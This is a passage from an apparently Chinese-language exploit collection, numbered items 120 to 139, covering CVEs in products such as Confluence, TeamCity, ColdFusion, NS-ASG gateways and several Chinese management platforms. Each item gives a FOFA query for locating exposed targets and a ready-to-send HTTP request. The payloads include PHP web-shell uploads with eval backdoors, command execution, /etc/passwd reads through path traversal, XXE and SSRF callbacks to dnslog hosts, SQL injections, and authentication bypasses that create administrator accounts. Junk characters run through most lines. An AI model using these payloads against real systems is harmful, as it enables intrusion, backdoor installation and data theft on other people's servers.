$ z: i6 i, p+ ? w6 [! [120. 北京百绰智能S40管理平台导入web.php任意文件上传# X/ O% L: o6 ]* s
CVE-2024-1253( P* l/ F* t5 _! R
FOFA:title="Smart管理平台"8 V3 }5 Z+ _$ T/ U; v$ a# D
POST /useratte/web.php? HTTP/1.18 m' e( L! l& d" n" n4 A# f) K! C
Host: ip:port! p4 q' s7 t9 P: O! V7 v" U. E# S
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db# P- O6 v' ~3 ]9 A
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko& x( D8 ]+ b3 O, S9 J% }+ p% Q# a
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
) Z' L+ M# |- T3 XAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 L$ M8 D! _6 M: _
Accept-Encoding: gzip, deflate3 @7 r. N, c, q5 Q) X2 H3 `
Content-Type: multipart/form-data; boundary=---------------------------423289041236658752706300793282 r6 U+ P2 c5 S) C
Content-Length: 5978 @ o' G4 r9 d9 J
Origin: https://ip:port; T, h$ q0 R& A+ |5 v
Referer: https://ip:port/sysmanage/licence.php
7 A$ M5 h6 i6 T& X+ v+ bUpgrade-Insecure-Requests: 1
6 k+ {7 z7 o& v& ^5 o! Y3 Q4 TSec-Fetch-Dest: document
9 o$ u7 B8 q% `Sec-Fetch-Mode: navigate
; G2 |3 k% B/ |& n, Y1 ?Sec-Fetch-Site: same-origin, p# m @" V3 [' j6 r' P% L
Sec-Fetch-User: ?1( M5 ?3 f6 a8 \; Y
Te: trailers
7 L; b& I( z; y, a% D/ g! L- j Z$ WConnection: close
% P/ f0 G6 l0 z- k5 k. V! F/ d) s `) e
-----------------------------423289041236658752706300793283 C7 H6 G( h! C5 J/ E/ d+ g, C' i" m, T
Content-Disposition: form-data; name="file_upload"; filename="2.php"7 m: L6 e1 X6 O+ \! F
Content-Type: application/octet-stream4 ?' Z6 B; |6 o' s9 t; B% S
: B+ I. U, _! ~6 E1 u4 m<?php phpinfo()?>
) i2 W% C6 V! L( R7 x. R- o% M-----------------------------42328904123665875270630079328
6 O# C( K4 z3 J. wContent-Disposition: form-data; name="id_type"6 S) k& _( O0 c, q: x3 @9 |; r
7 Q h# A) P8 P* e
1
5 x& v$ ^1 y1 Q5 v R. m-----------------------------42328904123665875270630079328
5 a6 ~7 V- r1 EContent-Disposition: form-data; name="1_ck"- i a8 v$ Z) h: s2 s5 K1 D
9 R2 F. i3 V9 l/ F5 [9 {) m5 L1_radhttp: I- {% R5 f1 d \ q5 I
-----------------------------42328904123665875270630079328
2 {! ?' [2 z" ?; BContent-Disposition: form-data; name="mode"
1 }/ `, M3 ~# \( y
( K6 V+ R( Y* P. z; pimport
, n" W6 M$ _, F- I. `' L+ O J, {% t* V-----------------------------423289041236658752706300793288 N% K* V; X. g8 N' A
0 S0 x6 T' f6 X) n8 l% B
* o& y9 e% ^4 {4 ?( ?6 E( M' B
文件路径/upload/2.php
. T1 E( `, J* v- [' M2 _* \9 A
' W2 Z" I" E' Y# B121. 北京百绰智能S42管理平台userattestation.php任意文件上传
2 _- @1 E1 c9 s# I: E- v0 nCVE-2024-1918
& ~( C- S3 w% U' _! c7 k1 AFOFA:title="Smart管理平台"
6 F- h# b/ C5 N+ U4 vPOST /useratte/userattestation.php HTTP/1.1
2 ~8 b) C3 Y( [' \5 @0 aHost: 192.168.40.130:84439 n4 b( t" e. d" k
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
0 c$ T$ w- ?" h8 z3 k, w3 l; @User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko3 b- C e5 j; O1 c' l6 p! w3 J
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8% g$ E+ B1 ^' o$ I& K L& C
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ o+ z+ ?/ c* |: T% dAccept-Encoding: gzip, deflate# N4 q. g8 r- H; ]! ~$ d
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328 l& V- d a" [
Content-Length: 592
# K V H# m# |% IOrigin: https://192.168.40.130:8443
5 e! A( L- w3 A4 Y+ S4 i2 L( f ^# VUpgrade-Insecure-Requests: 1' A& W) ~; h% P# ?
Sec-Fetch-Dest: document
8 {4 n; B q. \2 z/ n) O% @Sec-Fetch-Mode: navigate7 W; Y8 d: e$ b! u: N$ V/ Q
Sec-Fetch-Site: same-origin
$ Q6 ?$ \3 F9 l2 c8 `! e9 DSec-Fetch-User: ?1/ Q! R( a6 [# h
Te: trailers2 k& z& P) q0 n5 o ~
Connection: close
& \6 A- `$ B9 t$ Q- S! e
9 t l# f1 M) I- ^, U; v. L$ Q( d8 Q-----------------------------423289041236658752706300793280 ?( b7 C& |$ R, y3 s& R4 [
Content-Disposition: form-data; name="web_img"; filename="1.php"
9 e" o: d4 c" {7 q- {Content-Type: application/octet-stream# W+ m6 X# c% X, @0 z+ z7 U W
! \3 ]* p& U7 q0 ?# }
<?php phpinfo();?>
7 U: z+ h& \& Q-----------------------------42328904123665875270630079328
% H' i+ p) t w; IContent-Disposition: form-data; name="id_type"
$ e$ u- n% O( h5 a# |. p$ K7 t7 ~
7 a$ f# ^6 b; @& `4 p4 x# }14 s$ @% a9 ?, z' l7 C/ O, i" x# T% I
-----------------------------42328904123665875270630079328
2 c; ?" _9 h4 \' SContent-Disposition: form-data; name="1_ck"6 K0 d( x& ~/ [0 g# R
2 A4 ], E; B4 m- t2 Z. @% a4 g1_radhttp* a" q9 b) c1 V8 S
-----------------------------42328904123665875270630079328
; u* \7 F6 ?9 r( vContent-Disposition: form-data; name="hidwel"
9 f1 @* H% B( w1 R9 h
7 B- t" }# t0 w6 B4 }' Sset
3 i/ b$ D- ^7 q) x-----------------------------42328904123665875270630079328: J. y4 w& o+ U1 s5 Q7 I5 {
Q& F! f% t8 r4 V8 U4 ?/ }- j1 R1 @4 N3 u3 |7 P( ?
boot/web/upload/weblogo/1.php
$ T2 I7 _1 f2 N3 X. Z5 t9 q' s: K+ C, M7 F! j, |
122. 北京百绰智能s200管理平台/importexport.php sql注入' X4 D! W' f" j# }. A4 s
CVE-2024-27718FOFA:title="Smart管理平台"
8 q) T' y& D% M; A- m其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()" ~1 c, C' o* J. G& |9 Y
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
( x. j3 p7 V$ g' u0 VHost: x.x.x.x# Y1 Q' o5 ~7 j
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0# O: Q8 G5 ?; X! b7 c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
& w4 H4 } U# g; ]$ fAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5 a5 I2 V7 Z& c, C, S: g7 H' P: cAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 ?+ V+ u. {. z* K2 X1 k& w4 L- L$ m
Accept-Encoding: gzip, deflate, br
. K, `5 M4 E6 j$ h qUpgrade-Insecure-Requests: 1( u5 B4 I0 M h9 H, _2 ~$ y
Sec-Fetch-Dest: document
4 i/ Z4 k9 [4 |6 N! g6 ?9 pSec-Fetch-Mode: navigate' L5 `- V9 J6 r( y, X: t
Sec-Fetch-Site: none
\9 ^8 v) {; r' vSec-Fetch-User: ?14 |; h1 Y5 J5 s% k8 f% s7 a
Te: trailers2 |; x" ?1 Y$ v
Connection: close2 V$ n' A. h1 x! a
" f) A) @3 y. s7 ]* v/ j+ G
5 J0 c$ N" w' O
123. Atlassian Confluence 模板注入代码执行; F- e3 i- y' H' X. }
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"* M5 a# p6 r- o6 I$ b. g: c4 f6 _
POST /template/aui/text-inline.vm HTTP/1.1) h# G& y! I( m5 b0 g
Host: localhost:8090
8 h8 V+ k. [- L1 ]( LAccept-Encoding: gzip, deflate, br H9 ?+ n( k) |. E' d
Accept: */*
) w" f0 s- v4 K6 J, T& FAccept-Language: en-US;q=0.9,en;q=0.8
4 w P5 {# M+ AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
/ |( \5 G; `, d6 J. k. SConnection: close
i, B* I( W% h6 ]! k4 j/ vContent-Type: application/x-www-form-urlencoded
/ p" U, r) T2 w5 m2 \# R/ _! J7 P/ m5 C# C) ^
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))5 A. a' `$ R7 Z3 i9 K( ^) A7 V
* |2 z% A, W1 y* x k) Z/ m
! R3 r8 d' m2 E- d+ Z3 O( |- S124. 湖南建研工程质量检测系统任意文件上传
8 {6 C! x+ A2 c) h* A6 j7 v: uFOFA:body="/Content/Theme/Standard/webSite/login.css"8 d, g1 ]' u8 @# G# C+ i$ I+ d( D
POST /Scripts/admintool?type=updatefile HTTP/1.1& p) ]" B7 B! P' a7 u
Host: 192.168.40.130:8282
6 P5 J$ J1 l2 n3 h. Q3 j) HUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.362 h4 Y; L/ b, O3 w d. ^
Content-Length: 72* k: k+ A' _: O
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
5 u3 E) o* S: E9 y0 mAccept-Encoding: gzip, deflate, br
2 P+ I5 W! r! ^0 iAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# m* r& u! F! T& V# [0 ^. v6 i
Connection: close+ F9 _7 T; Q/ b* O C/ G, [3 M
Content-Type: application/x-www-form-urlencoded$ G# ^4 x9 d' r z9 x3 c
0 q. }5 n, x: jfilePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
8 G7 f/ H$ `* \ F' m! g0 N
. U4 o2 Z3 T1 f, J7 k: r) h5 }
http://192.168.40.130:8282/Scripts/abcgcg.aspx
4 o9 B5 l7 g) C1 T( q( A5 d3 q3 |% S
h! B# f" c- O! c! Z2 Q3 |0 `8 J125. ConnectWise ScreenConnect身份验证绕过
9 n! a! h: U' gCVE-2024-1709' y- C* N: V, y6 L1 _1 D* i. S
FOFA:icon_hash="-82958153"7 K9 N7 _# U8 H6 Q6 R' M2 }. ?
https://github.com/watchtowrlabs ... bypass-add-user-poc8 b5 A! W# E* j) ]! s
3 Z _6 M! I/ |# L
6 A# w+ m7 i- b使用方法
. b* w+ p1 Z0 S$ mpython watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123! s% m- M+ X5 G; Q" @) H: |/ q
' s: Y" e1 s0 y, Y# ~* J
: i$ c" O( B$ d& _) B& e创建好用户后直接登录后台,可以执行系统命令。
. C4 Z+ r+ b# @! h( g* z" o! J* I6 n5 U, ?3 P1 L# S! f
126. Aiohttp 路径遍历
3 q: i: ^) E$ y$ YFOFA:title=="ComfyUI"* C4 K) `; U; ^7 ~( V; t9 q
GET /static/../../../../../etc/passwd HTTP/1.1
/ \" f% Q# c8 a& jHost: x.x.x.x
: S) t- o4 {. _$ V) m. y( lUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.362 ]9 }7 }8 c) }$ Y# `
Connection: close
; @9 |) e; ^3 c' W, QAccept: */** a, X" V; S' n8 o0 t
Accept-Language: en
! d; C' J1 i1 \& W( EAccept-Encoding: gzip7 E2 D9 `6 _! |; F7 L e
0 M: X {7 O! D% a1 H
7 ^3 q, n1 p+ L% }1 E+ E0 n
127. 广联达Linkworks DataExchange.ashx XXE3 }% i5 R! I* S5 M
FOFA:body="Services/Identification/login.ashx"
: P- {) }4 [* ?1 Q" o; r/ `POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
/ \5 n4 s- L" u. x, vHost: 192.168.40.130:8888! n( V: ~7 B; H' o: R. c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
- S% X* Q/ P, a0 {/ UContent-Length: 4150 O0 W6 y9 d2 U; ]7 B% {0 D! Y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7* ?/ n$ s! ?. c! F& C2 t' H
Accept-Encoding: gzip, deflate
# s3 ^4 i- T$ h1 F+ N* RAccept-Language: zh-CN,zh;q=0.9
9 w% t7 S8 q7 @1 |: _! WConnection: close( A% r+ z7 S: A
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0; d# L" U3 G6 T# y8 I
Purpose: prefetch7 d9 i2 M0 t ~
Sec-Purpose: prefetch;prerender
5 T2 y& P1 L" D2 e) ~# d6 d) Q+ F8 c- z7 J" ]# }* h
------WebKitFormBoundaryJGgV5l5ta05yAIe0
5 H0 ]7 N1 ]+ |, r( S) ^# [Content-Disposition: form-data;name="SystemName"# Q4 x! M2 u" S& f3 x+ M
8 V5 Y" C6 n( u) w3 L- T8 s {
BIM
2 g. n) r9 G) Z" M9 J0 C------WebKitFormBoundaryJGgV5l5ta05yAIe0
6 h+ t* V i D/ F+ G7 s5 h2 A& [Content-Disposition: form-data;name="Params"1 I1 u& Q- Y0 Y9 u t
Content-Type: text/plain
9 k; x S% m8 C4 V9 O4 I& y: _: n' h* I, b3 I
<?xml version="1.0" encoding="UTF-8"?>% f: Z4 g4 j9 J
<!DOCTYPE test [! a2 X" a% E9 L9 h0 D( K; H; s/ H
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
4 H1 F* n7 ^6 W$ e7 j) V/ T. e]
( H5 O D$ f( f$ Q>
# n; e3 c& [4 F6 t* K7 c2 `<test>&t;</test>9 H. ]3 h0 ]7 w4 v# S) h
------WebKitFormBoundaryJGgV5l5ta05yAIe0--" |5 v h7 U# D5 |( O! c* H
& o5 U4 v( ~! b8 [1 C" R, o
, d! t5 U' f& C% n( g+ l, Z4 |4 z, V, V; O6 d, D* G
128. Adobe ColdFusion 反序列化
, j- W( i* l1 _$ xCVE-2023-38203- ]. ^! U5 Y, ~) N" g5 i: H* M: w
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)9 w9 G7 S" q0 J9 S% }
FOFA:app="Adobe-ColdFusion"0 b9 v: _& g( h0 [' A4 I
PAYLOAD
' d( G- H9 u" V# M& Q& D6 e+ e; i3 X @# r
129. Adobe ColdFusion 任意文件读取* Q Q# z! @+ a6 h3 L
CVE-2024-20767
0 J; g' z8 b+ g! nFOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
$ ?3 F5 w/ B/ X9 m X第一步,获取uuid6 V8 ]6 d( e9 D, Z$ P9 V! g
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1/ L8 u" s& L' L$ L# T3 ~; A
Host: x.x.x.x+ B" q: q/ h5 t* Z1 w6 z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
" w+ j9 J! c& Z7 \/ Q+ q( f+ n1 CAccept: */*# Y6 X+ X8 Y5 O- H
Accept-Encoding: gzip, deflate$ T) r# n; {9 }- U- v
Connection: close+ `( w8 l. g0 l4 g, d3 i0 S/ ?" b; b
% w) T' t" d$ O* m* a
$ N! T+ m: b% X% _第二步,读取/etc/passwd文件! f6 C; ~( k/ L1 ?% T6 Q
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
+ Y0 S! q4 w8 D' O( dHost: x.x.x.x
# c. J# A, j0 r" ~/ P$ x7 BUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.363 r% V' m k( t3 U7 `
Accept: */*+ b" ?1 T( }- t$ c& b( v
Accept-Encoding: gzip, deflate$ N' B. u# n! A. N2 W# V
Connection: close3 }9 `3 S6 J2 J, q) k
uuid: 85f60018-a654-4410-a783-f81cbd5000b97 r+ |1 d* p. t1 J% e6 O
4 c! {6 W# u; q) w% Y6 t
y3 z E% y: U: y! q/ J130. Laykefu客服系统任意文件上传3 l* f- n1 ^" @ K; R$ [$ W9 s
FOFA:icon_hash="-334624619"# a8 B- }9 c0 d, T
POST /admin/users/upavatar.html HTTP/1.1
. U0 _( {6 G# |Host: 127.0.0.1+ c4 W& Z: ?: p/ M( E7 W
Accept: application/json, text/javascript, */*; q=0.01% l1 s, ~7 {+ g2 N. S! L
X-Requested-With: XMLHttpRequest: D% B. q% i2 K
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26. h# ~6 O T0 Z% @
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
$ O4 \6 ?7 t* p8 o/ R/ TAccept-Encoding: gzip, deflate
, [$ c4 N; W' B0 D( h# k% j0 iAccept-Language: zh-CN,zh;q=0.9
) `1 w4 B7 J1 Z1 Q9 jCookie: user_name=1; user_id=3
8 m0 a& N v- u m4 W8 XConnection: close* M- g# j6 B2 A
' O( [; L+ I4 i. E/ |) O) O------WebKitFormBoundary3OCVBiwBVsNuB2kR
5 {0 ^0 y0 q" g+ f jContent-Disposition: form-data; name="file"; filename="1.php"! `, i" S Q& Z7 N! _! Y# n) H1 v
Content-Type: image/png# ?5 G1 t$ x9 N0 Q& W/ B
! t7 i6 Y* }) g& a. ?<?php phpinfo();@eval($_POST['sec']);?>4 H2 D7 Q% Y+ w5 Z: p+ D
------WebKitFormBoundary3OCVBiwBVsNuB2kR--% ?# o/ k" Z; ~9 o6 F! j
& ?6 @- Z$ `! r' K
" a0 w: ~2 E: I$ M131. Mini-Tmall <=20231017 SQL注入
4 c7 R2 m# x7 Q, [FOFA:icon_hash="-2087517259"5 G) p( O0 q" a! u z* H% a8 G* p
后台地址:http://localhost:8080/tmall/admin
( N+ t7 j; N; a5 _7 U" ohttp://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)2 K7 R( B* k2 B' n- [ L$ t
( j4 q& t" x2 Z: L2 |5 T/ L132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
- J W5 P1 P vCVE-2024-27198
" E$ K, p) S- q0 DFOFA:body="Log in to TeamCity"
% I: j7 P3 P2 a e- T4 T% V" z( n' WPOST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1( @0 \ E5 N. I8 m
Host: 192.168.40.130:8111
5 v8 J& Y: N1 j; {, J& y, m% w. SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36/ b& _3 x' i+ u- u
Accept: */*, b' ?" \! P/ A! F$ X$ w
Content-Type: application/json2 w5 v% v2 g/ R \4 I* c5 _- t
Accept-Encoding: gzip, deflate
$ D l0 }* c$ A0 P7 l, B7 K' h% S' i# @( X+ @: [6 X& ?4 D
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}5 z" B! h" Z; y5 A4 A
2 N2 \4 R' G, j" d! n
# z8 L ^' X- i# MCVE-2024-27199
9 s9 f% W) {2 d" s( Z0 \/res/../admin/diagnostic.jsp
B% @8 X* g6 N* A/.well-known/acme-challenge/../../admin/diagnostic.jsp$ c! o$ c2 I% r& O1 x' Q6 ~
/update/../admin/diagnostic.jsp3 A9 ?. T1 ?' k1 C/ G) n, p$ _
8 T3 }6 c' N( F' ^
: I: z$ l7 ?& C7 O* t2 D5 dCVE-2024-27198-RCE.py- B+ I1 y) V q+ s! [0 \3 v7 l0 y
9 ~9 |" t6 B+ i% d133. H5 云商城 file.php 文件上传
5 g/ G! m; A) x2 e _6 oFOFA:body="/public/qbsp.php"! E+ G0 X9 D- r$ R5 z' O
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1+ J2 T/ `' n9 U7 J
Host: your-ip) T% a. \* z: L: t& V& c
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
+ p: @) O% a1 H8 R5 l) dContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx' s4 s- M5 o& K
$ B( L" ?. i+ Q1 r( V Z
------WebKitFormBoundaryFQqYtrIWb8iBxUCx
* z" Y; Z/ U/ \: _4 H+ Y( q+ A G7 ?Content-Disposition: form-data; name="file"; filename="rce.php"% Z* C8 J* o! U$ h" b: }
Content-Type: application/octet-stream6 S7 H) F" t" D, V
% _% f b2 e2 w) I, b& G) J
<?php system("cat /etc/passwd");unlink(__FILE__);?>
: N; t% V2 t: k; n# w------WebKitFormBoundaryFQqYtrIWb8iBxUCx--1 ^! y2 j; J7 {1 J- n$ ]
2 t8 @- s; p5 }7 y( A( f( G! A2 }) h2 L* I: e: I
" X+ O6 Z; j& F/ Z* M134. 网康NS-ASG应用安全网关index.php sql注入
+ @% d4 u+ O) Q& o1 ]* D9 J8 i: pCVE-2024-23302 w( y8 Z# m8 j
Netentsec NS-ASG Application Security Gateway 6.3版本5 c" Y9 N+ A; U# O0 z' h
FOFA:app="网康科技-NS-ASG安全网关"
2 ^5 u2 [) t# UPOST /protocol/index.php HTTP/1.13 @, v9 l0 n" ~
Host: x.x.x.x. q6 m9 {4 J5 }5 m4 J! p
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
6 S+ w N R4 G( Z: z7 v- I' `5 u3 b! nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0! }% b, X, j" J$ v9 X
Accept: */*
% R9 H% `! x- E& ~. s. j* vAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 I, P2 L# ]7 C0 l5 ~1 e
Accept-Encoding: gzip, deflate% I" [# y2 q2 {: ^" {7 X5 H4 L4 Z
Sec-Fetch-Dest: empty
4 ~9 F4 y3 D% dSec-Fetch-Mode: cors9 @& x5 \* r' G5 v; y% e
Sec-Fetch-Site: same-origin
. A$ W) K5 s. G: S: ?( `) n0 J1 kTe: trailers$ ?. {$ K" Q# S( V( }
Connection: close
, q) S, u: F" s0 PContent-Type: application/x-www-form-urlencoded
% [+ N/ W' M8 X4 s( d8 _Content-Length: 263
: y; q! N- F1 l' n; O
, o" Z5 ~4 B6 o* N/ fjsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
7 r* [2 ?/ u4 j$ n3 Z9 K+ c2 m
4 Q; x4 ~/ r) \; d* g7 K# ?1 y7 [
; P O7 R$ R* N135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
D9 R8 I: ?4 CCVE-2024-2022
" y5 r- Y, q' ~: N, j jNetentsec NS-ASG Application Security Gateway 6.3版本* c, _: b2 d7 H$ C1 k
FOFA:app="网康科技-NS-ASG安全网关"0 w1 h" u% k0 c
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
: z1 x/ o' W5 cHost: x.x.x.x
7 Y; Y& h8 B6 s! d2 e' WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.362 U8 {4 q: Y* ?- Q2 R: }
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7, X. }$ l+ `9 m% k: u8 I# G" W9 T4 Q3 f
Accept-Encoding: gzip, deflate
6 k! [/ ~# ` F3 o% W9 i' rAccept-Language: zh-CN,zh;q=0.9
# u5 U9 D3 O! `( [Connection: close
4 G* t+ P) J' f* Z' _7 Q8 m
) M6 S( [0 l1 q6 z) k. ?
$ P& x# R+ U: ` y# r" b2 `136. NextChat cors SSRF
* f3 r( z" \; A' z7 e5 h+ M9 vCVE-2023-497858 M1 N9 Z9 {2 M& T! A- Y
FOFA:title="NextChat"0 d0 v% r4 F5 Q) t
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
7 A7 c3 n$ o, j" ?; mHost: x.x.x.x:10000
' d& H! b o. P; `# o: IUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
1 w$ w+ t# R! N0 T9 \Connection: close
8 t: e# e8 k2 t* e" tAccept: */*
6 M# B2 h6 h# s0 YAccept-Language: en& d2 l2 }8 o/ G4 ` U+ j R' L
Accept-Encoding: gzip! C# s) Z O% P, W: S3 n: L
' w, Y. l0 A& t" R9 e: E
2 {# y K6 {8 k1 C% @
137. 福建科立迅通信指挥调度平台down_file.php sql注入6 i/ b! [# f, N6 ~% P& N
CVE-2024-2620
) r& W' h2 D& s9 @5 XFOFA:body="app/structure/departments.php" || app="指挥调度管理平台", S8 p5 g: H( X5 Y. \# D
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
4 U, q8 u4 H& z: Z: w2 g. [$ s# `7 lHost: x.x.x.x
# [# ], t. a0 V1 O3 x* x7 s( @! H" YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.03 Z7 R1 J( G8 q- {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8$ E' N( f/ i; z- Z2 b; s) e+ t9 g
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: D+ \7 g* W, b! wAccept-Encoding: gzip, deflate, br8 @! o5 I% `4 y3 A; V1 Z8 C/ z
Connection: close
# C* c" `' p( p3 ICookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj- ] a5 S+ f% l4 [
Upgrade-Insecure-Requests: 1
0 u% H+ ?! `- J, T/ A3 B% G$ y
! J3 b& [3 j6 c
4 \) i3 g( m. i# Q138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
4 y& U2 p; R7 A4 d: WCVE-2024-2621
1 x0 J$ _1 k+ s8 f8 k6 |6 p! iFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"$ w( e8 n% j3 c0 r
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
' ]; c% k8 g* d8 ?+ z, V" _( ?0 S: mHost: x.x.x.x
& N; T3 y/ M& K% G) j7 P- \- {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
1 j7 r5 }/ `. }0 ` r% gAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8, U. B/ q- Z6 N* k" z5 ?
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) w# C7 R9 {5 Y+ D& JAccept-Encoding: gzip, deflate, br& l- E4 n/ X4 |8 _0 C. ^# \ ~) X" V- R
Connection: close! t: Q! w9 N% b- ^9 [# Z4 n. o
Upgrade-Insecure-Requests: 1
! Q: C$ z/ Q1 k4 B
" m% l$ z$ p; \& k; H
* W, M5 O x+ t- }; _: D6 Q$ ^( }139. 福建科立讯通信指挥调度平台editemedia.php sql注入
c" n% k7 S; K( S& w: hCVE-2024-2622: t, \, F5 O0 c/ F: K
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"8 g# s+ u# X0 ^8 O) t2 l6 u o
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
3 m, ]' |) _9 \' d) Z; eHost: x.x.x.x
